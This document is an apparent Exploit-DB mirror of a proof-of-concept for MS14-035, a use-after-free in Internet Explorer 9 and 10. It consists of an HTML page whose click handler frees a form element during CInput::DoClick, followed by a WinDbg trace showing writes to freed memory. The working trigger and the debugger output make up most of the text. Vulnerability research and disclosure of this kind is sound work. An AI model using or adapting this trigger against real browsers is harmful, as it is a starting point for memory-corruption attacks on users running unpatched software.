Microsoft Internet Explorer 9/10 – CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035) - 体验盒子

作者： Drozdova Liudmila
日期： 2014-07-08
类别：
dos
平台：
windows_x86
来源：https://www.exploit-db.com/exploits/34010/
<!--
Exploit Title: MS14-035 Internet Explorer CFormElement Use-after-free and memory corruption POC (no crash! see trace)
Product: Internet Explorer
Vulnerable version: 9,10
Date: 8.07.2014
Exploit Author: Drozdova Liudmila, ITDefensor Vulnerability Research Team (http://itdefensor.ru/)
Vendor Homepage: http://www.microsoft.com/
Tested on: Window 7 SP1 x86 IE 9,10
CVE : unknown
-->
<html>

<body>


<form id="form1">
 <input id="input1" type="text" value="">
</form>


<script>

	loaded = false ;

function func()	{

	if (loaded)	{
		document.body.innerHTML = "" ; // free CFormElement
	}

}


	input1 = document.getElementById("input1") ;
	input1.onclick = func ;
	loaded = true ;
	input1.click(); // Call DoClick function
	
	


</script>
</body>

</html>
<!--
Vulnerability details

MSHTML!CInput::DoClick

66943670 8bcfmov ecx,edi
66943672 ff751cpushdword ptr [ebp+1Ch]
66943675 ff7518pushdword ptr [ebp+18h]
66943678 ff7514pushdword ptr [ebp+14h]
6694367b ff7510pushdword ptr [ebp+10h]
6694367e ff750cpushdword ptr [ebp+0Ch]
66943681 ff7508pushdword ptr [ebp+8]<---- esi = CFormElement
66943684 e856e4f3ffcallMSHTML!CElement::DoClick (66881adf) <--- call of func() in javascript, free esi
66943689 85dbtestebx,ebx 
6694368b 7408jeMSHTML!CInput::DoClick+0x74 (66943695)
6694368d 83666400and dword ptr [esi+64h],0 ds:0023:0034cd84=00000001 ; memory corruption, write to freed memory
66943691 836668feand dword ptr [esi+68h],0FFFFFFFEh; memory corruption, write to freed memory

 MSHTML!CInput::DoClick+0x60:
66943681 ff7508pushdword ptr [ebp+8]ss:0023:023ec994=00000000
0:005> p
eax=00000001 ebx=00000001 ecx=00317540 edx=66943621 esi=0034cd20 edi=00317540
eip=66943684 esp=023ec95c ebp=023ec98c iopl=0 nv up ei pl nz na po nc
cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000202
MSHTML!CInput::DoClick+0x63:
66943684 e856e4f3ffcallMSHTML!CElement::DoClick (66881adf)
0:005> dds esi l1
0034cd206661ead8 MSHTML!CFormElement::`vftable'



0:005> !heap -x esi <-- esi contains valid pointer to CFormElement
Entry UserHeapSegment SizePrevSizeUnusedFlags
-----------------------------------------------------------------------------
0034cd180034cd2000270000002fcee878-cLFH;busy 

0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=66943689 esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl zr na pe nc
cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000246
MSHTML!CInput::DoClick+0x68:
66943689 85dbtestebx,ebx
0:005> dds esi l1
0034cd206661005c MSHTML!CSVGPathSegCurvetoCubicAbs::`vftable'+0x12c




0:005> !heap -x esi <-- esi contains freed pointer to CFormElement
Entry UserHeapSegment SizePrevSizeUnusedFlags
-----------------------------------------------------------------------------
0034cd180034cd2000270000002fcee878-0LFH;free 

0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368b esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl nz na po nc
cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000202
MSHTML!CInput::DoClick+0x6a:
6694368b 7408jeMSHTML!CInput::DoClick+0x74 (66943695)[br=0]
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368d esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl nz na po nc
cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000202
MSHTML!CInput::DoClick+0x6c:
6694368d 83666400and dword ptr [esi+64h],0 ds:0023:0034cd84=00000001


-->